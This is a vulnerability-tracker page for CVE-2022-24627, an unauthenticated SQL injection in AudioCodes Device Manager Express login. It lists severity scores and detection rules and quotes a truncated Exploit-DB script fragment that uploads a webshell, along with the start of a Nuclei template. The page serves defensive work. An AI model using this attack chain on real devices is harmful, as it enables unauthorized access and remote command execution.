CVE-2022-24627
published 2023-05-29CVE-2022-24627: An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the…
PriorityP275critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
26.39%
97.8th percentile
An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| audiocodes | device_manager_express | <= 7.8.20002.47752 | — |
Detection & IOCsextracted from sources · hover to see the quote
sigma↗
words: ['SQL syntax', 'mysql_fetch', 'You have an error in your SQL syntax']
- →Detect SQLi exploitation attempts against the login form by monitoring POST requests to /admin/AudioCodes_files/process_login.php with the 'p' parameter containing SQL injection payloads (e.g., URL-encoded quote/OR/comment sequences). ↗
- →Alert on HTTP responses from AudioCodes Device Manager containing SQL error strings such as 'SQL syntax', 'mysql_fetch', or 'You have an error in your SQL syntax', which indicate successful SQLi triggering. ↗
- →Monitor POST requests to /admin/AudioCodes_files/BrowseFiles.php?cmd=ssh with body containing 'ssh_command=' as an indicator of post-exploitation remote command execution (CVE-2022-24631). ↗
- →Monitor POST requests to /admin/AudioCodes_files/ajax/ajaxGlobalSettings.php with action=saveext and a modified extensions list as an indicator of file-upload extension whitelisting for webshell upload. ↗
- →Detect webshell upload by monitoring POST requests to the upload endpoint with 'dir' set to 'C:/audiocodes/express/WebAdmin/region/' and file content-type 'text/html'. ↗
- →Use Shodan/FOFA queries to identify exposed AudioCodes Device Manager Express instances as attack surface: title:"Audiocodes" or http.title:"audiocodes". ↗
- ·The exploit targets AudioCodes Device Manager Express version 7.8.20002.47752 specifically; the product was announced EOL on 07-02-2022, meaning no patch will be issued by the vendor. ↗
- ·The Nuclei template uses a two-step flow: first confirming the target is an AudioCodes instance (body contains 'audiocodes'), then sending the SQLi payload — detections should account for this two-request pattern. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
exploitdb·2023-03-30·CVSS 9.8
CVE-2022-24632 [CRITICAL] Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
---
# Exploit Title: Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
# Date: 02-12-22
# Exploit Author: 0xEF
# Vendor Homepage: https://www.audiocodes.com
# Software Link: https://ln5.sync.com/dl/82774fdd0/jwqwt632-s65tncqu-iwrtm7g3-iidti637
# Version: '
files = {f'myfile': (file, shell, 'text/html')}
body = {'dir': 'C:/audiocodes/express/WebAdmin/region/', 'type': '', 'Submit': 'Upload'}
r = s.post(url, files=files, data=body)
print(f'\nBackdoor location:')
print(f'{Fore.GREEN}(+) http://{target}/region/{file}?{param}=dir{Style.RESET_ALL}')
patch = '2'
time.sleep(1)
patch_ext(s,target,patch,ext)
else:
print(f'{Fore.RED}(-) Could not whitelist extension {ext}.. Try something else\n{Style.RESET_ALL}'
Nuclei
AudioCodes Device Manager Express - SQL Injection
nuclei·CVSS 9.8
CVE-2022-24627 [CRITICAL] AudioCodes Device Manager Express - SQL Injection
AudioCodes Device Manager Express - SQL Injection
An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
Template:
id: CVE-2022-24627
info:
name: AudioCodes Device Manager Express - SQL Injection
author: geeknik
severity: critical
description: |
An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
impact: |
Unauthenticated attackers can exploit SQL injection in the login form to bypass authentication, extract sensitive VoIP configuration data, and potentially gain administrative access to the AudioCodes Device Manager system.
remediatio
2023-05-29
Published